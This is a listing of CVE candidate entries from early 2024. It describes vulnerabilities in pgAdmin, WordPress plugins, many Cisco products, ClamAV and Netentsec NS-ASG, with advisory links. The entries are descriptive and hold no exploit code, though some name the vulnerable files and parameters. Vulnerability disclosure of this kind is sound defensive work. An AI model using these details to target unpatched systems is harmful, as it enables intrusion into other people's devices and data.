CVE 2024 2044 Candidate pgAdmin <= 8.3 is affected by a path-traversal vulnerability while deserializing users’ sessions in the session handling code. If the server is running on Windows, an unauthenticated attacker can load and deserialize remote pickle objects and gain code execution. If the server is running on POSIX/Linux, an authenticated attacker can upload pickle objects, deserialize them, and gain code execution. FEDORA:FEDORA-2024-15df3b6d95 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LUYN2JXKKHFSVTASH344TBRGWDH64XQV/ | MISC:https://github.com/pgadmin-org/pgadmin4/issues/7258 | URL:https://github.com/pgadmin-org/pgadmin4/issues/7258 | MISC:https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/ | URL:https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/ Assigned (20240229)
CVE 2024 2042 Candidate The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Accordion widget in all versions up to, and including, 3.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.0.4/widgets/image-accordion/image-accordion.php#L962 | URL:https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.0.4/widgets/image-accordion/image-accordion.php#L962 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050248%40elementskit-lite&new=3050248%40elementskit-lite&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3050248%40elementskit-lite&new=3050248%40elementskit-lite&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/be4ce3e6-8baa-419f-a48e-4256c306fbc1?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/be4ce3e6-8baa-419f-a48e-4256c306fbc1?source=cve Assigned (20240229)
CVE 2024 20346 Candidate A vulnerability in the web-based management interface of Cisco AppDynamics Controller could allow an authenticated, remote attacker to perform a reflected cross-site scripting (XSS) attack against a user of the interface of an affected device. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. MISC:cisco-sa-appd-xss-3JwqSMNT | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-appd-xss-3JwqSMNT Assigned (20231108)
CVE 2024 20345 Candidate A vulnerability in the file upload functionality of Cisco AppDynamics Controller could allow an authenticated, remote attacker to conduct directory traversal attacks on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted request to an affected device. A successful exploit could allow the attacker to access sensitive data on an affected device. MISC:cisco-sa-appd-traversal-m7N8mZpF | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-appd-traversal-m7N8mZpF Assigned (20231108)
CVE 2024 20344 Candidate A vulnerability in system resource management in Cisco UCS 6400 and 6500 Series Fabric Interconnects that are in Intersight Managed Mode (IMM) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on the Device Console UI of an affected device. This vulnerability is due to insufficient rate-limiting of TCP connections to an affected device. An attacker could exploit this vulnerability by sending a high number of TCP packets to the Device Console UI. A successful exploit could allow an attacker to cause the Device Console UI process to crash, resulting in a DoS condition. A manual reload of the fabric interconnect is needed to restore complete functionality. MISC:cisco-sa-ucsfi-imm-syn-p6kZTDQC | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ucsfi-imm-syn-p6kZTDQC Assigned (20231108)
CVE 2024 20338 Candidate A vulnerability in the ISE Posture (System Scan) module of Cisco Secure Client for Linux could allow an authenticated, local attacker to elevate privileges on an affected device. This vulnerability is due to the use of an uncontrolled search path element. An attacker could exploit this vulnerability by copying a malicious library file to a specific directory in the filesystem and persuading an administrator to restart a specific process. A successful exploit could allow the attacker to execute arbitrary code on an affected device with root privileges. MISC:cisco-sa-secure-privesc-sYxQO6ds | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-secure-privesc-sYxQO6ds Assigned (20231108)
CVE 2024 20337 Candidate A vulnerability in the SAML authentication process of Cisco Secure Client could allow an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link while establishing a VPN session. A successful exploit could allow the attacker to execute arbitrary script code in the browser or access sensitive, browser-based information, including a valid SAML token. The attacker could then use the token to establish a remote access VPN session with the privileges of the affected user. Individual hosts and services behind the VPN headend would still need additional credentials for successful access. MISC:cisco-sa-secure-client-crlf-W43V4G7 | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-secure-client-crlf-W43V4G7 Assigned (20231108)
CVE 2024 20336 Candidate A vulnerability in the web-based user interface of Cisco Small Business 100, 300, and 500 Series Wireless APs could allow an authenticated, remote attacker to perform buffer overflow attacks against an affected device. In order to exploit this vulnerability, the attacker must have valid administrative credentials for the device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. MISC:cisco-sa-sb-wap-multi-85G83CRB | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-wap-multi-85G83CRB Assigned (20231108)
CVE 2024 20335 Candidate A vulnerability in the web-based management interface of Cisco Small Business 100, 300, and 500 Series Wireless APs could allow an authenticated, remote attacker to perform command injection attacks against an affected device. In order to exploit this vulnerability, the attacker must have valid administrative credentials for the device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system. MISC:cisco-sa-sb-wap-multi-85G83CRB | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-wap-multi-85G83CRB Assigned (20231108)
CVE 2024 20328 Candidate A vulnerability in the VirusEvent feature of ClamAV could allow a local attacker to inject arbitrary commands with the privileges of the application service account.The vulnerability is due to unsafe handling of file names. A local attacker could exploit this vulnerability by supplying a file name containing command-line sequences. When processed on a system using configuration options for the VirusEvent feature, the attacker could cause the application to execute arbitrary commands. ClamAV has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. MISC:https://blog.clamav.net/2023/11/clamav-130-122-105-released.html | URL:https://blog.clamav.net/2023/11/clamav-130-122-105-released.html Assigned (20231108)
CVE 2024 20327 Candidate A vulnerability in the PPP over Ethernet (PPPoE) termination feature of Cisco IOS XR Software for Cisco ASR 9000 Series Aggregation Services Routers could allow an unauthenticated, adjacent attacker to crash the ppp_ma process, resulting in a denial of service (DoS) condition. This vulnerability is due to the improper handling of malformed PPPoE packets that are received on a router that is running Broadband Network Gateway (BNG) functionality with PPPoE termination on a Lightspeed-based or Lightspeed-Plus-based line card. An attacker could exploit this vulnerability by sending a crafted PPPoE packet to an affected line card interface that does not terminate PPPoE. A successful exploit could allow the attacker to crash the ppp_ma process, resulting in a DoS condition for PPPoE traffic across the router. MISC:cisco-sa-iosxr-pppma-JKWFgneW | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-pppma-JKWFgneW Assigned (20231108)
CVE 2024 20325 Candidate A vulnerability in the Live Data server of Cisco Unified Intelligence Center could allow an unauthenticated, local attacker to read and modify data in a repository that belongs to an internal service on an affected device. This vulnerability is due to insufficient access control implementations on cluster configuration CLI requests. An attacker could exploit this vulnerability by sending a cluster configuration CLI request to specific directories on an affected device. A successful exploit could allow the attacker to read and modify data that is handled by an internal service on the affected device. MISC:cisco-sa-cuic-access-control-jJsZQMjj | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuic-access-control-jJsZQMjj Assigned (20231108)
CVE 2024 20322 Candidate A vulnerability in the access control list (ACL) processing on Pseudowire interfaces in the ingress direction of Cisco IOS XR Software could allow an unauthenticated, remote attacker to bypass a configured ACL. This vulnerability is due to improper assignment of lookup keys to internal interface contexts. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access resources behind the affected device that were supposed to be protected by a configured ACL. MISC:cisco-sa-iosxr-acl-bypass-RZU5NL3e | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-acl-bypass-RZU5NL3e Assigned (20231108)
CVE 2024 20321 Candidate A vulnerability in the External Border Gateway Protocol (eBGP) implementation of Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability exists because eBGP traffic is mapped to a shared hardware rate-limiter queue. An attacker could exploit this vulnerability by sending large amounts of network traffic with certain characteristics through an affected device. A successful exploit could allow the attacker to cause eBGP neighbor sessions to be dropped, leading to a DoS condition in the network. MISC:cisco-sa-nxos-ebgp-dos-L3QCwVJ | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-ebgp-dos-L3QCwVJ Assigned (20231108)
CVE 2024 20320 Candidate A vulnerability in the SSH client feature of Cisco IOS XR Software for Cisco 8000 Series Routers and Cisco Network Convergence System (NCS) 540 Series and 5700 Series Routers could allow an authenticated, local attacker to elevate privileges on an affected device. This vulnerability is due to insufficient validation of arguments that are included with the SSH client CLI command. An attacker with low-privileged access to an affected device could exploit this vulnerability by issuing a crafted SSH client command to the CLI. A successful exploit could allow the attacker to elevate privileges to root on the affected device. MISC:cisco-sa-iosxr-ssh-privesc-eWDMKew3 | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-ssh-privesc-eWDMKew3 Assigned (20231108)
CVE 2024 20319 Candidate A vulnerability in the UDP forwarding code of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to bypass configured management plane protection policies and access the Simple Network Management Plane (SNMP) server of an affected device. This vulnerability is due to incorrect UDP forwarding programming when using SNMP with management plane protection. An attacker could exploit this vulnerability by attempting to perform an SNMP operation using broadcast as the destination address that could be processed by an affected device that is configured with an SNMP server. A successful exploit could allow the attacker to communicate to the device on the configured SNMP ports. Although an unauthenticated attacker could send UDP datagrams to the configured SNMP port, only an authenticated user can retrieve or modify data using SNMP requests. MISC:cisco-sa-snmp-uhv6ZDeF | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-snmp-uhv6ZDeF Assigned (20231108)
CVE 2024 20318 Candidate A vulnerability in the Layer 2 Ethernet services of Cisco IOS XR Software could allow an unauthenticated, adjacent attacker to cause the line card network processor to reset, resulting in a denial of service (DoS) condition. This vulnerability is due to the incorrect handling of specific Ethernet frames that are received on line cards that have the Layer 2 services feature enabled. An attacker could exploit this vulnerability by sending specific Ethernet frames through an affected device. A successful exploit could allow the attacker to cause the ingress interface network processor to reset, resulting in a loss of traffic over the interfaces that are supported by the network processor. Multiple resets of the network processor would cause the line card to reset, resulting in a DoS condition. MISC:cisco-sa-xrl2vpn-jesrU3fc | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-xrl2vpn-jesrU3fc Assigned (20231108)
CVE 2024 20315 Candidate A vulnerability in the access control list (ACL) processing on MPLS interfaces in the ingress direction of Cisco IOS XR Software could allow an unauthenticated, remote attacker to bypass a configured ACL. This vulnerability is due to improper assignment of lookup keys to internal interface contexts. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access resources behind the affected device that were supposed to be protected by a configured ACL. MISC:cisco-sa-iosxr-acl-bypass-RZU5NL3e | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-acl-bypass-RZU5NL3e Assigned (20231108)
CVE 2024 2031 Candidate The Video Conferencing with Zoom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zoom_recordings_by_meeting' shortcode in all versions up to, and including, 4.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3048838/video-conferencing-with-zoom-api/trunk/includes/Shortcodes/Recordings.php | URL:https://plugins.trac.wordpress.org/changeset/3048838/video-conferencing-with-zoom-api/trunk/includes/Shortcodes/Recordings.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/06e48355-6932-4401-8787-e6432444930f?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/06e48355-6932-4401-8787-e6432444930f?source=cve Assigned (20240229)
CVE 2024 20305 Candidate A vulnerability in the web-based management interface of Cisco Unity Connection could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. MISC:cisco-sa-cuc-xss-9TFuu5MS | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuc-xss-9TFuu5MS Assigned (20231108)
CVE 2024 20301 Candidate A vulnerability in Cisco Duo Authentication for Windows Logon and RDP could allow an authenticated, physical attacker to bypass secondary authentication and access an affected Windows device. This vulnerability is due to a failure to invalidate locally created trusted sessions after a reboot of the affected device. An attacker with primary user credentials could exploit this vulnerability by attempting to authenticate to an affected device. A successful exploit could allow the attacker to access the affected device without valid permissions. MISC:cisco-sa-duo-win-bypass-pn42KKBm | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-duo-win-bypass-pn42KKBm Assigned (20231108)
CVE 2024 2030 Candidate The Database for Contact Form 7, WPforms, Elementor forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/contact-form-entries.php | URL:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/contact-form-entries.php | MISC:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/templates/leads-table.php | URL:https://plugins.trac.wordpress.org/browser/contact-form-entries/trunk/templates/leads-table.php | MISC:https://plugins.trac.wordpress.org/changeset/3046066/ | URL:https://plugins.trac.wordpress.org/changeset/3046066/ | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4528b63-8d8e-44a4-a71f-2ad1636ac93c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/c4528b63-8d8e-44a4-a71f-2ad1636ac93c?source=cve Assigned (20240229)
CVE 2024 20294 Candidate A vulnerability in the Link Layer Discovery Protocol (LLDP) feature of Cisco FXOS Software and Cisco NX-OS Software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to improper handling of specific fields in an LLDP frame. An attacker could exploit this vulnerability by sending a crafted LLDP packet to an interface of an affected device and having an authenticated user retrieve LLDP statistics from the affected device through CLI show commands or Simple Network Management Protocol (SNMP) requests. A successful exploit could allow the attacker to cause the LLDP service to crash and stop running on the affected device. In certain situations, the LLDP crash may result in a reload of the affected device. Note: LLDP is a Layer 2 link protocol. To exploit this vulnerability, an attacker would need to be directly connected to an interface of an affected device, either physically or logically (for example, through a Layer 2 Tunnel configured to transport the LLDP protocol). MISC:cisco-sa-nxos-lldp-dos-z7PncTgt | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-lldp-dos-z7PncTgt Assigned (20231108)
CVE 2024 20292 Candidate A vulnerability in the logging component of Cisco Duo Authentication for Windows Logon and RDP could allow an authenticated, local attacker to view sensitive information in clear text on an affected system. This vulnerability is due to improper storage of an unencrypted registry key in certain logs. An attacker could exploit this vulnerability by accessing the logs on an affected system. A successful exploit could allow the attacker to view sensitive information in clear text. MISC:cisco-sa-duo-infodisc-rLCEqm6T | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-duo-infodisc-rLCEqm6T Assigned (20231108)
CVE 2024 20291 Candidate A vulnerability in the access control list (ACL) programming for port channel subinterfaces of Cisco Nexus 3000 and 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, remote attacker to send traffic that should be blocked through an affected device. This vulnerability is due to incorrect hardware programming that occurs when configuration changes are made to port channel member ports. An attacker could exploit this vulnerability by attempting to send traffic through an affected device. A successful exploit could allow the attacker to access network resources that should be protected by an ACL that was applied on port channel subinterfaces. MISC:cisco-sa-nxos-po-acl-TkyePgvL | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-po-acl-TkyePgvL Assigned (20231108)
CVE 2024 20290 Candidate A vulnerability in the OLE2 file format parser of ClamAV could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. This vulnerability is due to an incorrect check for end-of-string values during scanning, which may result in a heap buffer over-read. An attacker could exploit this vulnerability by submitting a crafted file containing OLE2 content to be scanned by ClamAV on an affected device. A successful exploit could allow the attacker to cause the ClamAV scanning process to terminate, resulting in a DoS condition on the affected software and consuming available system resources. For a description of this vulnerability, see the ClamAV blog . FEDORA:FEDORA-2024-3439911df6 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5FXZYVDNV66RNMNVJOHAJAYRZV4U64CQ/ | FEDORA:FEDORA-2024-c42cf0e576 | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6MUDUPAHAAV6FPB2C2QIQCFJ4SHYBOTY/ | MISC:cisco-sa-clamav-hDffu6t | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-clamav-hDffu6t Assigned (20231108)
CVE 2024 20287 Candidate A vulnerability in the web-based management interface of the Cisco WAP371 Wireless-AC/N Dual Radio Access Point (AP) with Single Point Setup could allow an authenticated, remote attacker to perform command injection attacks against an affected device. This vulnerability is due to improper validation of user-supplied input. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to execute arbitrary commands with root privileges on the device. To exploit this vulnerability, the attacker must have valid administrative credentials for the device. MISC:cisco-sa-sb-wap-inject-bHStWgXO | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-wap-inject-bHStWgXO Assigned (20231108)
CVE 2024 2028 Candidate The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Covid-19 Stats Widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor | URL:https://plugins.trac.wordpress.org/changeset/3042217/exclusive-addons-for-elementor | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d44ecf8a-d19a-403a-96c7-89e223a5cc22?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d44ecf8a-d19a-403a-96c7-89e223a5cc22?source=cve Assigned (20240229)
CVE 2024 20277 Candidate A vulnerability in the web-based management interface of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root. This vulnerability is due to insufficient validation of user-supplied input for the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP packet to the affected device. A successful exploit could allow the attacker to execute arbitrary commands and elevate privileges to root. MISC:cisco-sa-thouseyes-privesc-DmzHG3Qv | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-thouseyes-privesc-DmzHG3Qv Assigned (20231108)
CVE 2024 20272 Candidate A vulnerability in the web-based management interface of Cisco Unity Connection could allow an unauthenticated, remote attacker to upload arbitrary files to an affected system and execute commands on the underlying operating system. This vulnerability is due to a lack of authentication in a specific API and improper validation of user-supplied data. An attacker could exploit this vulnerability by uploading arbitrary files to an affected system. A successful exploit could allow the attacker to store malicious files on the system, execute arbitrary commands on the operating system, and elevate privileges to root. MISC:cisco-sa-cuc-unauth-afu-FROYsCsD | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cuc-unauth-afu-FROYsCsD Assigned (20231108)
CVE 2024 20270 Candidate A vulnerability in the web-based management interface of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. MISC:cisco-sa-broadworks-xss-6syj82Ju | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-broadworks-xss-6syj82Ju Assigned (20231108)
CVE 2024 20267 Candidate A vulnerability with the handling of MPLS traffic for Cisco NX-OS Software could allow an unauthenticated, remote attacker to cause the netstack process to unexpectedly restart, which could cause the device to stop processing network traffic or to reload. This vulnerability is due to lack of proper error checking when processing an ingress MPLS frame. An attacker could exploit this vulnerability by sending a crafted IPv6 packet that is encapsulated within an MPLS frame to an MPLS-enabled interface of the targeted device. A successful exploit could allow the attacker to cause a denial of service (DoS) condition. Note: The IPv6 packet can be generated multiple hops away from the targeted device and then encapsulated within MPLS. The DoS condition may occur when the NX-OS device processes the packet. MISC:cisco-sa-ipv6-mpls-dos-R9ycXkwM | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ipv6-mpls-dos-R9ycXkwM Assigned (20231108)
CVE 2024 20266 Candidate A vulnerability in the DHCP version 4 (DHCPv4) server feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to trigger a crash of the dhcpd process, resulting in a denial of service (DoS) condition. This vulnerability exists because certain DHCPv4 messages are improperly validated when they are processed by an affected device. An attacker could exploit this vulnerability by sending a malformed DHCPv4 message to an affected device. A successful exploit could allow the attacker to cause a crash of the dhcpd process. While the dhcpd process is restarting, which may take approximately two minutes, DHCPv4 server services are unavailable on the affected device. This could temporarily prevent network access to clients that join the network during that time period and rely on the DHCPv4 server of the affected device. Notes: Only the dhcpd process crashes and eventually restarts automatically. The router does not reload. This vulnerability only applies to DHCPv4. DHCP version 6 (DHCPv6) is not affected. MISC:cisco-sa-iosxr-dhcp-dos-3tgPKRdm | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-dhcp-dos-3tgPKRdm Assigned (20231108)
CVE 2024 20263 Candidate A vulnerability with the access control list (ACL) management within a stacked switch configuration of Cisco Business 250 Series Smart Switches and Business 350 Series Managed Switches could allow an unauthenticated, remote attacker to bypass protection offered by a configured ACL on an affected device. This vulnerability is due to incorrect processing of ACLs on a stacked configuration when either the primary or backup switches experience a full stack reload or power cycle. An attacker could exploit this vulnerability by sending crafted traffic through an affected device. A successful exploit could allow the attacker to bypass configured ACLs, causing traffic to be dropped or forwarded in an unexpected manner. The attacker does not have control over the conditions that result in the device being in the vulnerable state. Note: In the vulnerable state, the ACL would be correctly applied on the primary devices but could be incorrectly applied to the backup devices. MISC:cisco-sa-sb-bus-acl-bypass-5zn9hNJk | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-bus-acl-bypass-5zn9hNJk Assigned (20231108)
CVE 2024 20262 Candidate A vulnerability in the Secure Copy Protocol (SCP) and SFTP feature of Cisco IOS XR Software could allow an authenticated, local attacker to create or overwrite files in a system directory, which could lead to a denial of service (DoS) condition. The attacker would require valid user credentials to perform this attack. This vulnerability is due to a lack of proper validation of SCP and SFTP CLI input parameters. An attacker could exploit this vulnerability by authenticating to the device and issuing SCP or SFTP CLI commands with specific parameters. A successful exploit could allow the attacker to impact the functionality of the device, which could lead to a DoS condition. The device may need to be manually rebooted to recover. Note: This vulnerability is exploitable only when a local user invokes SCP or SFTP commands at the Cisco IOS XR CLI. A local user with administrative privileges could exploit this vulnerability remotely. MISC:cisco-sa-iosxr-scp-dos-kb6sUUHw | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-scp-dos-kb6sUUHw Assigned (20231108)
CVE 2024 20255 Candidate A vulnerability in the SOAP API of Cisco Expressway Series and Cisco TelePresence Video Communication Server could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected system. An attacker could exploit this vulnerability by persuading a user of the REST API to follow a crafted link. A successful exploit could allow the attacker to cause the affected system to reload. MISC:cisco-sa-expressway-csrf-KnnZDMj3 | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-csrf-KnnZDMj3 Assigned (20231108)
CVE 2024 20254 Candidate Multiple vulnerabilities in Cisco Expressway Series and Cisco TelePresence Video Communication Server (VCS) could allow an unauthenticated, remote attacker to conduct cross-site request forgery (CSRF) attacks that perform arbitrary actions on an affected device. Note: "Cisco Expressway Series" refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices. For more information about these vulnerabilities, see the Details ["#details"] section of this advisory. MISC:cisco-sa-expressway-csrf-KnnZDMj3 | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-expressway-csrf-KnnZDMj3 Assigned (20231108)
CVE 2024 20253 Candidate A vulnerability in multiple Cisco Unified Communications and Contact Center Solutions products could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. This vulnerability is due to the improper processing of user-provided data that is being read into memory. An attacker could exploit this vulnerability by sending a crafted message to a listening port of an affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the privileges of the web services user. With access to the underlying operating system, the attacker could also establish root access on the affected device. MISC:cisco-sa-cucm-rce-bWNzQcUm | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-rce-bWNzQcUm Assigned (20231108)
CVE 2024 20251 Candidate A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to perform a stored cross-site scripting (XSS) attack against a user of the interface on an affected device. This vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. MISC:cisco-sa-ISE-XSS-bL4VTML | URL:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ISE-XSS-bL4VTML Assigned (20231108)
CVE 2024 2025 Candidate The "BuddyPress WooCommerce My Account Integration. Create WooCommerce Member Pages" plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.20 via deserialization of untrusted input in the get_simple_request function. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code. MISC:https://plugins.trac.wordpress.org/changeset/3055634/wc4bp/trunk/class/includes/class-request-helper.php | URL:https://plugins.trac.wordpress.org/changeset/3055634/wc4bp/trunk/class/includes/class-request-helper.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/78da9e79-399e-43e3-ac27-a162861cae71?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/78da9e79-399e-43e3-ac27-a162861cae71?source=cve Assigned (20240229)
CVE 2024 2022 Candidate A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/list_ipAddressPolicy.php. The manipulation of the argument GroupId leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-255301 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-255301 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255301 | MISC:VDB-255301 | Netentsec NS-ASG Application Security Gateway list_ipAddressPolicy.php sql injection | URL:https://vuldb.com/?id.255301 | MISC:https://github.com/zouzuo1994321/cve/blob/main/cve.md | URL:https://github.com/zouzuo1994321/cve/blob/main/cve.md Assigned (20240229)
CVE 2024 2021 Candidate A vulnerability was found in Netentsec NS-ASG Application Security Gateway 6.3. It has been classified as critical. Affected is an unknown function of the file /admin/list_localuser.php. The manipulation of the argument ResId leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-255300. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-255300 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.255300 | MISC:VDB-255300 | Netentsec NS-ASG Application Security Gateway list_localuser.php sql injection | URL:https://vuldb.com/?id.255300 | MISC:https://github.com/dtxharry/cve/blob/main/cve.md | URL:https://github.com/dtxharry/cve/blob/main/cve.md Assigned (20240229)
